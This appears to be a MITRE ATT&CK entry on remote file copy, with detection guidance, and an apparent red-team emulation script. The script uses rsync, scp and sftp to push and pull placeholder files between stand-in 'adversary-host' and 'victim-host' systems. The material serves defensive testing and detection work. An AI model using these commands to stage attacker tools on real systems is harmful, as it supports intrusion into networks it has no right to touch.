Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.
Detection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring
Permissions Required: User
Requires Network: Yes
xxxx
Supported Platforms: Linux, macOS
### TODO: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
# Victim System Configuration
# Ensure SSH access has been configured for a victim account
# Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
# Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
# Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
# Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
# Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
# Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file